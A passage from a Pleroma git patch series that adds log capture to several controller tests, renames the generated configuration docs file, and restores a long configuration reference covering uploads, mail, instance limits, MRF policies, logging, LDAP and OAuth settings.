+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -3963,13 +3963,15 @@ test "returns error", %{conn: conn, user: user} do
Config.put([:suggestions, :enabled], true)
Config.put([:suggestions, :third_party_engine], "http://test500?{{host}}&{{user}}")
- res =
- conn
- |> assign(:user, user)
- |> get("/api/v1/suggestions")
- |> json_response(500)
+ assert capture_log(fn ->
+ res =
+ conn
+ |> assign(:user, user)
+ |> get("/api/v1/suggestions")
+ |> json_response(500)
- assert res == "Something went wrong"
+ assert res == "Something went wrong"
+ end) =~ "Could not retrieve suggestions"
end
test "returns suggestions", %{conn: conn, user: user, other_user: other_user} do
diff --git a/test/web/twitter_api/util_controller_test.exs b/test/web/twitter_api/util_controller_test.exs
index cf8e69d2b..e36d3130f 100644
--- a/test/web/twitter_api/util_controller_test.exs
+++ b/test/web/twitter_api/util_controller_test.exs
@@ -8,6 +8,7 @@ defmodule Pleroma.Web.TwitterAPI.UtilControllerTest do
alias Pleroma.Repo
alias Pleroma.User
alias Pleroma.Web.CommonAPI
+ import ExUnit.CaptureLog
import Pleroma.Factory
import Mock
@@ -338,12 +339,14 @@ test "show follow page if the `acct` is a account link", %{conn: conn} do
test "show follow page with error when user cannot fecth by `acct` link", %{conn: conn} do
user = insert(:user)
- response =
- conn
- |> assign(:user, user)
- |> get("/ostatus_subscribe?acct=https://mastodon.social/users/not_found")
+ assert capture_log(fn ->
+ response =
+ conn
+ |> assign(:user, user)
+ |> get("/ostatus_subscribe?acct=https://mastodon.social/users/not_found")
- assert html_response(response, 200) =~ "Error fetching user"
+ assert html_response(response, 200) =~ "Error fetching user"
+ end) =~ "Object has been deleted"
end
end
diff --git a/test/web/web_finger/web_finger_controller_test.exs b/test/web/web_finger/web_finger_controller_test.exs
index e23086b2a..bd3ccaaf7 100644
--- a/test/web/web_finger/web_finger_controller_test.exs
+++ b/test/web/web_finger/web_finger_controller_test.exs
@@ -5,6 +5,7 @@
defmodule Pleroma.Web.WebFinger.WebFingerControllerTest do
use Pleroma.Web.ConnCase
+ import ExUnit.CaptureLog
import Pleroma.Factory
import Tesla.Mock
@@ -75,11 +76,13 @@ test "it returns 404 when user isn't found (XML)" do
test "Sends a 404 when invalid format" do
user = insert(:user)
- assert_raise Phoenix.NotAcceptableError, fn ->
- build_conn()
- |> put_req_header("accept", "text/html")
- |> get("/.well-known/webfinger?resource=acct:#{user.nickname}@localhost")
- end
+ assert capture_log(fn ->
+ assert_raise Phoenix.NotAcceptableError, fn ->
+ build_conn()
+ |> put_req_header("accept", "text/html")
+ |> get("/.well-known/webfinger?resource=acct:#{user.nickname}@localhost")
+ end
+ end) =~ "no supported media type in accept header"
end
test "Sends a 400 when resource param is missing" do
From 69faec031d62f4e87a1791ae0c71ca4b0f02f12b Mon Sep 17 00:00:00 2001
From: Alex S
Date: Fri, 13 Sep 2019 19:02:42 +0300
Subject: [PATCH 065/272] markdown generation to the new file
---
lib/pleroma/docs/markdown.ex | 4 ++--
mix.exs | 3 +--
2 files changed, 3 insertions(+), 4 deletions(-)
diff --git a/lib/pleroma/docs/markdown.ex b/lib/pleroma/docs/markdown.ex
index 24930cc9f..8386dc2fb 100644
--- a/lib/pleroma/docs/markdown.ex
+++ b/lib/pleroma/docs/markdown.ex
@@ -3,9 +3,9 @@ defmodule Pleroma.Docs.Markdown do
@spec process(keyword()) :: {:ok, String.t()}
def process(descriptions) do
- config_path = "docs/config.md"
+ config_path = "docs/generated_config.md"
{:ok, file} = File.open(config_path, [:utf8, :write])
- IO.write(file, "# Configuration\n")
+ IO.write(file, "# Generated configuration\n")
IO.write(file, "Date of generation: #{Date.utc_today()}\n\n")
IO.write(
diff --git a/mix.exs b/mix.exs
index 96ef723b2..dfa530358 100644
--- a/mix.exs
+++ b/mix.exs
@@ -172,8 +172,7 @@ defp aliases do
"ecto.rollback": ["pleroma.ecto.rollback"],
"ecto.setup": ["ecto.create", "ecto.migrate", "run priv/repo/seeds.exs"],
"ecto.reset": ["ecto.drop", "ecto.setup"],
- test: ["ecto.create --quiet", "ecto.migrate", "test"],
- docs: ["pleroma.docs", "docs"]
+ test: ["ecto.create --quiet", "ecto.migrate", "test"]
]
end
From c625fe6f09a308f10e98c9e5ea4bf14500a0b58a Mon Sep 17 00:00:00 2001
From: Alex S
Date: Fri, 13 Sep 2019 19:03:39 +0300
Subject: [PATCH 066/272] config.md back
---
docs/config.md | 702 ++++++++++++++++++++++++++++++++++++++++++++++++-
1 file changed, 701 insertions(+), 1 deletion(-)
diff --git a/docs/config.md b/docs/config.md
index 7f54a34b1..066547bb1 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -1 +1,701 @@
-This file is a placeholder, please run mix pleroma.docs to generate it.
+# Configuration
+
+This file describe the configuration, it is recommended to edit the relevant *.secret.exs file instead of the others founds in the ``config`` directory.
+If you run Pleroma with ``MIX_ENV=prod`` the file is ``prod.secret.exs``, otherwise it is ``dev.secret.exs``.
+
+## Pleroma.Upload
+* `uploader`: Select which `Pleroma.Uploaders` to use
+* `filters`: List of `Pleroma.Upload.Filter` to use.
+* `link_name`: When enabled Pleroma will add a `name` parameter to the url of the upload, for example `https://instance.tld/media/corndog.png?name=corndog.png`. This is needed to provide the correct filename in Content-Disposition headers when using filters like `Pleroma.Upload.Filter.Dedupe`
+* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host.
+* `proxy_remote`: If you're using a remote uploader, Pleroma will proxy media requests instead of redirecting to it.
+* `proxy_opts`: Proxy options, see `Pleroma.ReverseProxy` documentation.
+
+Note: `strip_exif` has been replaced by `Pleroma.Upload.Filter.Mogrify`.
+
+## Pleroma.Uploaders.Local
+* `uploads`: Which directory to store the user-uploads in, relative to pleroma’s working directory
+
+## Pleroma.Uploaders.S3
+* `bucket`: S3 bucket name
+* `bucket_namespace`: S3 bucket namespace
+* `public_endpoint`: S3 endpoint that the user finally accesses(ex. "https://s3.dualstack.ap-northeast-1.amazonaws.com")
+* `truncated_namespace`: If you use S3 compatible service such as Digital Ocean Spaces or CDN, set folder name or "" etc.
+For example, when using CDN to S3 virtual host format, set "".
+At this time, write CNAME to CDN in public_endpoint.
+
+## Pleroma.Upload.Filter.Mogrify
+
+* `args`: List of actions for the `mogrify` command like `"strip"` or `["strip", "auto-orient", {"implode", "1"}]`.
+
+## Pleroma.Upload.Filter.Dedupe
+
+No specific configuration.
+
+## Pleroma.Upload.Filter.AnonymizeFilename
+
+This filter replaces the filename (not the path) of an upload. For complete obfuscation, add
+`Pleroma.Upload.Filter.Dedupe` before AnonymizeFilename.
+
+* `text`: Text to replace filenames in links. If empty, `{random}.extension` will be used. You can get the original filename extension by using `{extension}`, for example `custom-file-name.{extension}`.
+
+## Pleroma.Emails.Mailer
+* `adapter`: one of the mail adapters listed in [Swoosh readme](https://github.com/swoosh/swoosh#adapters), or `Swoosh.Adapters.Local` for in-memory mailbox.
+* `api_key` / `password` and / or other adapter-specific settings, per the above documentation.
+* `enabled`: Allows enable/disable send emails. Default: `false`.
+
+An example for Sendgrid adapter:
+
+```elixir
+config :pleroma, Pleroma.Emails.Mailer,
+ adapter: Swoosh.Adapters.Sendgrid,
+ api_key: "YOUR_API_KEY"
+```
+
+An example for SMTP adapter:
+
+```elixir
+config :pleroma, Pleroma.Emails.Mailer,
+ adapter: Swoosh.Adapters.SMTP,
+ relay: "smtp.gmail.com",
+ username: "YOUR_USERNAME@gmail.com",
+ password: "YOUR_SMTP_PASSWORD",
+ port: 465,
+ ssl: true,
+ tls: :always,
+ auth: :always
+```
+
+## :uri_schemes
+* `valid_schemes`: List of the scheme part that is considered valid to be an URL
+
+## :instance
+* `name`: The instance’s name
+* `email`: Email used to reach an Administrator/Moderator of the instance
+* `notify_email`: Email used for notifications.
+* `description`: The instance’s description, can be seen in nodeinfo and ``/api/v1/instance``
+* `limit`: Posts character limit (CW/Subject included in the counter)
+* `remote_limit`: Hard character limit beyond which remote posts will be dropped.
+* `upload_limit`: File size limit of uploads (except for avatar, background, banner)
+* `avatar_upload_limit`: File size limit of user’s profile avatars
+* `background_upload_limit`: File size limit of user’s profile backgrounds
+* `banner_upload_limit`: File size limit of user’s profile banners
+* `poll_limits`: A map with poll limits for **local** polls
+ * `max_options`: Maximum number of options
+ * `max_option_chars`: Maximum number of characters per option
+ * `min_expiration`: Minimum expiration time (in seconds)
+ * `max_expiration`: Maximum expiration time (in seconds)
+* `registrations_open`: Enable registrations for anyone, invitations can be enabled when false.
+* `invites_enabled`: Enable user invitations for admins (depends on `registrations_open: false`).
+* `account_activation_required`: Require users to confirm their emails before signing in.
+* `federating`: Enable federation with other instances
+* `federation_incoming_replies_max_depth`: Max. depth of reply-to activities fetching on incoming federation, to prevent out-of-memory situations while fetching very long threads. If set to `nil`, threads of any depth will be fetched. Lower this value if you experience out-of-memory crashes.
+* `federation_reachability_timeout_days`: Timeout (in days) of each external federation target being unreachable prior to pausing federating to it.
+* `allow_relay`: Enable Pleroma’s Relay, which makes it possible to follow a whole instance
+* `rewrite_policy`: Message Rewrite Policy, either one or a list. Here are the ones available by default:
+ * `Pleroma.Web.ActivityPub.MRF.NoOpPolicy`: Doesn’t modify activities (default)
+ * `Pleroma.Web.ActivityPub.MRF.DropPolicy`: Drops all activities. It generally doesn’t makes sense to use in production
+ * `Pleroma.Web.ActivityPub.MRF.SimplePolicy`: Restrict the visibility of activities from certains instances (See ``:mrf_simple`` section)
+ * `Pleroma.Web.ActivityPub.MRF.TagPolicy`: Applies policies to individual users based on tags, which can be set using pleroma-fe/admin-fe/any other app that supports Pleroma Admin API. For example it allows marking posts from individual users nsfw (sensitive)
+ * `Pleroma.Web.ActivityPub.MRF.SubchainPolicy`: Selectively runs other MRF policies when messages match (see ``:mrf_subchain`` section)
+ * `Pleroma.Web.ActivityPub.MRF.RejectNonPublic`: Drops posts with non-public visibility settings (See ``:mrf_rejectnonpublic`` section)
+ * `Pleroma.Web.ActivityPub.MRF.EnsureRePrepended`: Rewrites posts to ensure that replies to posts with subjects do not have an identical subject and instead begin with re:.
+ * `Pleroma.Web.ActivityPub.MRF.AntiLinkSpamPolicy`: Rejects posts from likely spambots by rejecting posts from new users that contain links.
+ * `Pleroma.Web.ActivityPub.MRF.MediaProxyWarmingPolicy`: Crawls attachments using their MediaProxy URLs so that the MediaProxy cache is primed.
+ * `Pleroma.Web.ActivityPub.MRF.MentionPolicy`: Drops posts mentioning configurable users. (see `:mrf_mention` section)
+ * `Pleroma.Web.ActivityPub.MRF.VocabularyPolicy`: Restricts activities to a configured set of vocabulary. (see `:mrf_vocabulary` section)
+* `public`: Makes the client API in authentificated mode-only except for user-profiles. Useful for disabling the Local Timeline and The Whole Known Network.
+* `quarantined_instances`: List of ActivityPub instances where private(DMs, followers-only) activities will not be send.
+* `managed_config`: Whenether the config for pleroma-fe is configured in this config or in ``static/config.json``
+* `allowed_post_formats`: MIME-type list of formats allowed to be posted (transformed into HTML)
+* `mrf_transparency`: Make the content of your Message Rewrite Facility settings public (via nodeinfo).
+* `mrf_transparency_exclusions`: Exclude specific instance names from MRF transparency. The use of the exclusions feature will be disclosed in nodeinfo as a boolean value.
+* `scope_copy`: Copy the scope (private/unlisted/public) in replies to posts by default.
+* `subject_line_behavior`: Allows changing the default behaviour of subject lines in replies. Valid values:
+ * "email": Copy and preprend re:, as in email.
+ * "masto": Copy verbatim, as in Mastodon.
+ * "noop": Don't copy the subject.
+* `always_show_subject_input`: When set to false, auto-hide the subject field when it's empty.
+* `extended_nickname_format`: Set to `true` to use extended local nicknames format (allows underscores/dashes). This will break federation with
+ older software for theses nicknames.
+* `max_pinned_statuses`: The maximum number of pinned statuses. `0` will disable the feature.
+* `autofollowed_nicknames`: Set to nicknames of (local) users that every new user should automatically follow.
+* `no_attachment_links`: Set to true to disable automatically adding attachment link text to statuses
+* `welcome_message`: A message that will be send to a newly registered users as a direct message.
+* `welcome_user_nickname`: The nickname of the local user that sends the welcome message.
+* `max_report_comment_size`: The maximum size of the report comment (Default: `1000`)
+* `safe_dm_mentions`: If set to true, only mentions at the beginning of a post will be used to address people in direct messages. This is to prevent accidental mentioning of people when talking about them (e.g. "@friend hey i really don't like @enemy"). Default: `false`.
+* `healthcheck`: If set to true, system data will be shown on ``/api/pleroma/healthcheck``.
+* `remote_post_retention_days`: The default amount of days to retain remote posts when pruning the database.
+* `user_bio_length`: A user bio maximum length (default: `5000`)
+* `user_name_length`: A user name maximum length (default: `100`)
+* `skip_thread_containment`: Skip filter out broken threads. The default is `false`.
+* `limit_to_local_content`: Limit unauthenticated users to search for local statutes and users only. Possible values: `:unauthenticated`, `:all` and `false`. The default is `:unauthenticated`.
+* `dynamic_configuration`: Allow transferring configuration to DB with the subsequent customization from Admin api.
+* `max_account_fields`: The maximum number of custom fields in the user profile (default: `10`)
+* `max_remote_account_fields`: The maximum number of custom fields in the remote user profile (default: `20`)
+* `account_field_name_length`: An account field name maximum length (default: `512`)
+* `account_field_value_length`: An account field value maximum length (default: `512`)
+* `external_user_synchronization`: Enabling following/followers counters synchronization for external users.
+
+
+
+## :logger
+* `backends`: `:console` is used to send logs to stdout, `{ExSyslogger, :ex_syslogger}` to log to syslog, and `Quack.Logger` to log to Slack
+
+An example to enable ONLY ExSyslogger (f/ex in ``prod.secret.exs``) with info and debug suppressed:
+```elixir
+config :logger,
+ backends: [{ExSyslogger, :ex_syslogger}]
+
+config :logger, :ex_syslogger,
+ level: :warn
+```
+
+Another example, keeping console output and adding the pid to syslog output:
+```elixir
+config :logger,
+ backends: [:console, {ExSyslogger, :ex_syslogger}]
+
+config :logger, :ex_syslogger,
+ level: :warn,
+ option: [:pid, :ndelay]
+```
+
+See: [logger’s documentation](https://hexdocs.pm/logger/Logger.html) and [ex_syslogger’s documentation](https://hexdocs.pm/ex_syslogger/)
+
+An example of logging info to local syslog, but warn to a Slack channel:
+```elixir
+config :logger,
+ backends: [ {ExSyslogger, :ex_syslogger}, Quack.Logger ],
+ level: :info
+
+config :logger, :ex_syslogger,
+ level: :info,
+ ident: "pleroma",
+ format: "$metadata[$level] $message"
+
+config :quack,
+ level: :warn,
+ meta: [:all],
+ webhook_url: "https://hooks.slack.com/services/YOUR-API-KEY-HERE"
+```
+
+See the [Quack Github](https://github.com/azohra/quack) for more details
+
+## :frontend_configurations
+
+This can be used to configure a keyword list that keeps the configuration data for any kind of frontend. By default, settings for `pleroma_fe` and `masto_fe` are configured.
+
+Frontends can access these settings at `/api/pleroma/frontend_configurations`
+
+To add your own configuration for PleromaFE, use it like this:
+
+```elixir
+config :pleroma, :frontend_configurations,
+ pleroma_fe: %{
+ theme: "pleroma-dark",
+ # ... see /priv/static/static/config.json for the available keys.
+},
+ masto_fe: %{
+ showInstanceSpecificPanel: true
+ }
+```
+
+These settings **need to be complete**, they will override the defaults.
+
+NOTE: for versions < 1.0, you need to set [`:fe`](#fe) to false, as shown a few lines below.
+
+## :fe
+__THIS IS DEPRECATED__
+
+If you are using this method, please change it to the [`frontend_configurations`](#frontend_configurations) method.
+Please **set this option to false** in your config like this:
+
+```elixir
+config :pleroma, :fe, false
+```
+
+This section is used to configure Pleroma-FE, unless ``:managed_config`` in ``:instance`` is set to false.
+
+* `theme`: Which theme to use, they are defined in ``styles.json``
+* `logo`: URL of the logo, defaults to Pleroma’s logo
+* `logo_mask`: Whether to use only the logo's shape as a mask (true) or as a regular image (false)
+* `logo_margin`: What margin to use around the logo
+* `background`: URL of the background, unless viewing a user profile with a background that is set
+* `redirect_root_no_login`: relative URL which indicates where to redirect when a user isn’t logged in.
+* `redirect_root_login`: relative URL which indicates where to redirect when a user is logged in.
+* `show_instance_panel`: Whenether to show the instance’s specific panel.
+* `scope_options_enabled`: Enable setting an notice visibility and subject/CW when posting
+* `formatting_options_enabled`: Enable setting a formatting different than plain-text (ie. HTML, Markdown) when posting, relates to ``:instance, allowed_post_formats``
+* `collapse_message_with_subjects`: When a message has a subject(aka Content Warning), collapse it by default
+* `hide_post_stats`: Hide notices statistics(repeats, favorites, …)
+* `hide_user_stats`: Hide profile statistics(posts, posts per day, followers, followings, …)
+
+## :assets
+
+This section configures assets to be used with various frontends. Currently the only option
+relates to mascots on the mastodon frontend
+
+* `mascots`: KeywordList of mascots, each element __MUST__ contain both a `url` and a
+ `mime_type` key.
+* `default_mascot`: An element from `mascots` - This will be used as the default mascot
+ on MastoFE (default: `:pleroma_fox_tan`)
+
+## :mrf_simple
+* `media_removal`: List of instances to remove medias from
+* `media_nsfw`: List of instances to put medias as NSFW(sensitive) from
+* `federated_timeline_removal`: List of instances to remove from Federated (aka The Whole Known Network) Timeline
+* `reject`: List of instances to reject any activities from
+* `accept`: List of instances to accept any activities from
+* `report_removal`: List of instances to reject reports from
+* `avatar_removal`: List of instances to strip avatars from
+* `banner_removal`: List of instances to strip banners from
+
+## :mrf_subchain
+This policy processes messages through an alternate pipeline when a given message matches certain criteria.
+All criteria are configured as a map of regular expressions to lists of policy modules.
+
+* `match_actor`: Matches a series of regular expressions against the actor field.
+
+Example:
+
+```
+config :pleroma, :mrf_subchain,
+ match_actor: %{
+ ~r/https:\/\/example.com/s => [Pleroma.Web.ActivityPub.MRF.DropPolicy]
+ }
+```
+
+## :mrf_rejectnonpublic
+* `allow_followersonly`: whether to allow followers-only posts
+* `allow_direct`: whether to allow direct messages
+
+## :mrf_hellthread
+* `delist_threshold`: Number of mentioned users after which the message gets delisted (the message can still be seen, but it will not show up in public timelines and mentioned users won't get notifications about it). Set to 0 to disable.
+* `reject_threshold`: Number of mentioned users after which the messaged gets rejected. Set to 0 to disable.
+
+## :mrf_keyword
+* `reject`: A list of patterns which result in message being rejected, each pattern can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
+* `federated_timeline_removal`: A list of patterns which result in message being removed from federated timelines (a.k.a unlisted), each pattern can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
+* `replace`: A list of tuples containing `{pattern, replacement}`, `pattern` can be a string or a [regular expression](https://hexdocs.pm/elixir/Regex.html)
+
+## :mrf_mention
+* `actors`: A list of actors, for which to drop any posts mentioning.
+
+## :mrf_vocabulary
+* `accept`: A list of ActivityStreams terms to accept. If empty, all supported messages are accepted.
+* `reject`: A list of ActivityStreams terms to reject. If empty, no messages are rejected.
+
+## :media_proxy
+* `enabled`: Enables proxying of remote media to the instance’s proxy
+* `base_url`: The base URL to access a user-uploaded file. Useful when you want to proxy the media files via another host/CDN fronts.
+* `proxy_opts`: All options defined in `Pleroma.ReverseProxy` documentation, defaults to `[max_body_length: (25*1_048_576)]`.
+* `whitelist`: List of domains to bypass the mediaproxy
+
+## :gopher
+* `enabled`: Enables the gopher interface
+* `ip`: IP address to bind to
+* `port`: Port to bind to
+* `dstport`: Port advertised in urls (optional, defaults to `port`)
+
+## Pleroma.Web.Endpoint
+`Phoenix` endpoint configuration, all configuration options can be viewed [here](https://hexdocs.pm/phoenix/Phoenix.Endpoint.html#module-dynamic-configuration), only common options are listed here
+* `http` - a list containing http protocol configuration, all configuration options can be viewed [here](https://hexdocs.pm/plug_cowboy/Plug.Cowboy.html#module-options), only common options are listed here. For deployment using docker, you need to set this to `[ip: {0,0,0,0}, port: 4000]` to make pleroma accessible from other containers (such as your nginx server).
+ - `ip` - a tuple consisting of 4 integers
+ - `port`
+* `url` - a list containing the configuration for generating urls, accepts
+ - `host` - the host without the scheme and a post (e.g `example.com`, not `https://example.com:2020`)
+ - `scheme` - e.g `http`, `https`
+ - `port`
+ - `path`
+* `extra_cookie_attrs` - a list of `Key=Value` strings to be added as non-standard cookie attributes. Defaults to `["SameSite=Lax"]`. See the [SameSite article](https://www.owasp.org/index.php/SameSite) on OWASP for more info.
+
+
+
+**Important note**: if you modify anything inside these lists, default `config.exs` values will be overwritten, which may result in breakage, to make sure this does not happen please copy the default value for the list from `config.exs` and modify/add only what you need
+
+Example:
+```elixir
+config :pleroma, Pleroma.Web.Endpoint,
+ url: [host: "example.com", port: 2020, scheme: "https"],
+ http: [
+ # start copied from config.exs
+ dispatch: [
+ {:_,
+ [
+ {"/api/v1/streaming", Pleroma.Web.MastodonAPI.WebsocketHandler, []},
+ {"/websocket", Phoenix.Endpoint.CowboyWebSocket,
+ {Phoenix.Transports.WebSocket,
+ {Pleroma.Web.Endpoint, Pleroma.Web.UserSocket, websocket_config}}},
+ {:_, Phoenix.Endpoint.Cowboy2Handler, {Pleroma.Web.Endpoint, []}}
+ ]}
+ # end copied from config.exs
+ ],
+ port: 8080,
+ ip: {127, 0, 0, 1}
+ ]
+```
+
+This will make Pleroma listen on `127.0.0.1` port `8080` and generate urls starting with `https://example.com:2020`
+
+## :activitypub
+* ``unfollow_blocked``: Whether blocks result in people getting unfollowed
+* ``outgoing_blocks``: Whether to federate blocks to other instances
+* ``deny_follow_blocked``: Whether to disallow following an account that has blocked the user in question
+* ``sign_object_fetches``: Sign object fetches with HTTP signatures
+
+## :http_security
+* ``enabled``: Whether the managed content security policy is enabled
+* ``sts``: Whether to additionally send a `Strict-Transport-Security` header
+* ``sts_max_age``: The maximum age for the `Strict-Transport-Security` header if sent
+* ``ct_max_age``: The maximum age for the `Expect-CT` header if sent
+* ``referrer_policy``: The referrer policy to use, either `"same-origin"` or `"no-referrer"`
+* ``report_uri``: Adds the specified url to `report-uri` and `report-to` group in CSP header.
+
+## :mrf_user_allowlist
+
+The keys in this section are the domain names that the policy should apply to.
+Each key should be assigned a list of users that should be allowed through by
+their ActivityPub ID.
+
+An example:
+
+```elixir
+config :pleroma, :mrf_user_allowlist,
+ "example.org": ["https://example.org/users/admin"]
+```
+
+## :web_push_encryption, :vapid_details
+
+Web Push Notifications configuration. You can use the mix task `mix web_push.gen.keypair` to generate it.
+
+* ``subject``: a mailto link for the administrative contact. It’s best if this email is not a personal email address, but rather a group email so that if a person leaves an organization, is unavailable for an extended period, or otherwise can’t respond, someone else on the list can.
+* ``public_key``: VAPID public key
+* ``private_key``: VAPID private key
+
+## Pleroma.Captcha
+* `enabled`: Whether the captcha should be shown on registration
+* `method`: The method/service to use for captcha
+* `seconds_valid`: The time in seconds for which the captcha is valid
+
+### Pleroma.Captcha.Kocaptcha
+Kocaptcha is a very simple captcha service with a single API endpoint,
+the source code is here: https://github.com/koto-bank/kocaptcha. The default endpoint
+`https://captcha.kotobank.ch` is hosted by the developer.
+
+* `endpoint`: the kocaptcha endpoint to use
+
+## :admin_token
+
+Allows to set a token that can be used to authenticate with the admin api without using an actual user by giving it as the 'admin_token' parameter. Example:
+
+```elixir
+config :pleroma, :admin_token, "somerandomtoken"
+```
+
+You can then do
+
+```sh
+curl "http://localhost:4000/api/pleroma/admin/invite_token?admin_token=somerandomtoken"
+```
+
+## :pleroma_job_queue
+
+[Pleroma Job Queue](https://git.pleroma.social/pleroma/pleroma_job_queue) configuration: a list of queues with maximum concurrent jobs.
+
+Pleroma has the following queues:
+
+* `federator_outgoing` - Outgoing federation
+* `federator_incoming` - Incoming federation
+* `mailer` - Email sender, see [`Pleroma.Emails.Mailer`](#pleroma-emails-mailer)
+* `transmogrifier` - Transmogrifier
+* `web_push` - Web push notifications
+* `scheduled_activities` - Scheduled activities, see [`Pleroma.ScheduledActivities`](#pleromascheduledactivity)
+
+Example:
+
+```elixir
+config :pleroma_job_queue, :queues,
+ federator_incoming: 50,
+ federator_outgoing: 50
+```
+
+This config contains two queues: `federator_incoming` and `federator_outgoing`. Both have the `max_jobs` set to `50`.
+
+## Pleroma.Web.Federator.RetryQueue
+
+* `enabled`: If set to `true`, failed federation jobs will be retried
+* `max_jobs`: The maximum amount of parallel federation jobs running at the same time.
+* `initial_timeout`: The initial timeout in seconds
+* `max_retries`: The maximum number of times a federation job is retried
+
+## Pleroma.Web.Metadata
+* `providers`: a list of metadata providers to enable. Providers available:
+ * Pleroma.Web.Metadata.Providers.OpenGraph
+ * Pleroma.Web.Metadata.Providers.TwitterCard
+ * Pleroma.Web.Metadata.Providers.RelMe - add links from user bio with rel=me into the `` as ``
+* `unfurl_nsfw`: If set to `true` nsfw attachments will be shown in previews
+
+## :rich_media
+* `enabled`: if enabled the instance will parse metadata from attached links to generate link previews
+* `ignore_hosts`: list of hosts which will be ignored by the metadata parser. For example `["accounts.google.com", "xss.website"]`, defaults to `[]`.
+* `ignore_tld`: list TLDs (top-level domains) which will ignore for parse metadata. default is ["local", "localdomain", "lan"]
+* `parsers`: list of Rich Media parsers
+
+## :fetch_initial_posts
+* `enabled`: if enabled, when a new user is federated with, fetch some of their latest posts
+* `pages`: the amount of pages to fetch
+
+## :hackney_pools
+
+Advanced. Tweaks Hackney (http client) connections pools.
+
+There's three pools used:
+
+* `:federation` for the federation jobs.
+ You may want this pool max_connections to be at least equal to the number of federator jobs + retry queue jobs.
+* `:media` for rich media, media proxy
+* `:upload` for uploaded media (if using a remote uploader and `proxy_remote: true`)
+
+For each pool, the options are:
+
+* `max_connections` - how much connections a pool can hold
+* `timeout` - retention duration for connections
+
+## :auto_linker
+
+Configuration for the `auto_linker` library:
+
+* `class: "auto-linker"` - specify the class to be added to the generated link. false to clear
+* `rel: "noopener noreferrer"` - override the rel attribute. false to clear
+* `new_window: true` - set to false to remove `target='_blank'` attribute
+* `scheme: false` - Set to true to link urls with schema `http://google.com`
+* `truncate: false` - Set to a number to truncate urls longer then the number. Truncated urls will end in `..`
+* `strip_prefix: true` - Strip the scheme prefix
+* `extra: false` - link urls with rarely used schemes (magnet, ipfs, irc, etc.)
+
+Example:
+
+```elixir
+config :auto_linker,
+ opts: [
+ scheme: true,
+ extra: true,
+ class: false,
+ strip_prefix: false,
+ new_window: false,
+ rel: false
+ ]
+```
+
+## Pleroma.ScheduledActivity
+
+* `daily_user_limit`: the number of scheduled activities a user is allowed to create in a single day (Default: `25`)
+* `total_user_limit`: the number of scheduled activities a user is allowed to create in total (Default: `300`)
+* `enabled`: whether scheduled activities are sent to the job queue to be executed
+
+## Pleroma.ActivityExpiration
+
+# `enabled`: whether expired activities will be sent to the job queue to be deleted
+
+## Pleroma.Web.Auth.Authenticator
+
+* `Pleroma.Web.Auth.PleromaAuthenticator`: default database authenticator
+* `Pleroma.Web.Auth.LDAPAuthenticator`: LDAP authentication
+
+## :ldap
+
+Use LDAP for user authentication. When a user logs in to the Pleroma
+instance, the name and password will be verified by trying to authenticate
+(bind) to an LDAP server. If a user exists in the LDAP directory but there
+is no account with the same name yet on the Pleroma instance then a new
+Pleroma account will be created with the same name as the LDAP user name.
+
+* `enabled`: enables LDAP authentication
+* `host`: LDAP server hostname
+* `port`: LDAP port, e.g. 389 or 636
+* `ssl`: true to use SSL, usually implies the port 636
+* `sslopts`: additional SSL options
+* `tls`: true to start TLS, usually implies the port 389
+* `tlsopts`: additional TLS options
+* `base`: LDAP base, e.g. "dc=example,dc=com"
+* `uid`: LDAP attribute name to authenticate the user, e.g. when "cn", the filter will be "cn=username,base"
+
+## BBS / SSH access
+
+To enable simple command line interface accessible over ssh, add a setting like this to your configuration file:
+
+```exs
+app_dir = File.cwd!
+priv_dir = Path.join([app_dir, "priv/ssh_keys"])
+
+config :esshd,
+ enabled: true,
+ priv_dir: priv_dir,
+ handler: "Pleroma.BBS.Handler",
+ port: 10_022,
+ password_authenticator: "Pleroma.BBS.Authenticator"
+```
+
+Feel free to adjust the priv_dir and port number. Then you will have to create the key for the keys (in the example `priv/ssh_keys`) and create the host keys with `ssh-keygen -m PEM -N "" -b 2048 -t rsa -f ssh_host_rsa_key`. After restarting, you should be able to connect to your Pleroma instance with `ssh username@server -p $PORT`
+
+## :auth
+
+* `Pleroma.Web.Auth.PleromaAuthenticator`: default database authenticator
+* `Pleroma.Web.Auth.LDAPAuthenticator`: LDAP authentication
+
+Authentication / authorization settings.
+
+* `auth_template`: authentication form template. By default it's `show.html` which corresponds to `lib/pleroma/web/templates/o_auth/o_auth/show.html.eex`.
+* `oauth_consumer_template`: OAuth consumer mode authentication form template. By default it's `consumer.html` which corresponds to `lib/pleroma/web/templates/o_auth/o_auth/consumer.html.eex`.
+* `oauth_consumer_strategies`: the list of enabled OAuth consumer strategies; by default it's set by `OAUTH_CONSUMER_STRATEGIES` environment variable. Each entry in this space-delimited string should be of format `` or `:` (e.g. `twitter` or `keycloak:ueberauth_keycloak_strategy` in case dependency is named differently than `ueberauth_`).
+
+## :email_notifications
+
+Email notifications settings.
+
+ - digest - emails of "what you've missed" for users who have been
+ inactive for a while.
+ - active: globally enable or disable digest emails
+ - schedule: When to send digest email, in [crontab format](https://en.wikipedia.org/wiki/Cron).
+ "0 0 * * 0" is the default, meaning "once a week at midnight on Sunday morning"
+ - interval: Minimum interval between digest emails to one user
+ - inactivity_threshold: Minimum user inactivity threshold
+
+## Pleroma.Emails.UserEmail
+
+- `:logo` - a path to a custom logo. Set it to `nil` to use the default Pleroma logo.
+- `:styling` - a map with color settings for email templates.
+
+## OAuth consumer mode
+
+OAuth consumer mode allows sign in / sign up via external OAuth providers (e.g. Twitter, Facebook, Google, Microsoft, etc.).
+Implementation is based on Ueberauth; see the list of [available strategies](https://github.com/ueberauth/ueberauth/wiki/List-of-Strategies).
+
+Note: each strategy is shipped as a separate dependency; in order to get the strategies, run `OAUTH_CONSUMER_STRATEGIES="..." mix deps.get`,
+e.g. `OAUTH_CONSUMER_STRATEGIES="twitter facebook google microsoft" mix deps.get`.
+The server should also be started with `OAUTH_CONSUMER_STRATEGIES="..." mix phx.server` in case you enable any strategies.
+
+Note: each strategy requires separate setup (on external provider side and Pleroma side). Below are the guidelines on setting up most popular strategies.
+
+Note: make sure that `"SameSite=Lax"` is set in `extra_cookie_attrs` when you have this feature enabled. OAuth consumer mode will not work with `"SameSite=Strict"`
+
+* For Twitter, [register an app](https://developer.twitter.com/en/apps), configure callback URL to https:///oauth/twitter/callback
+
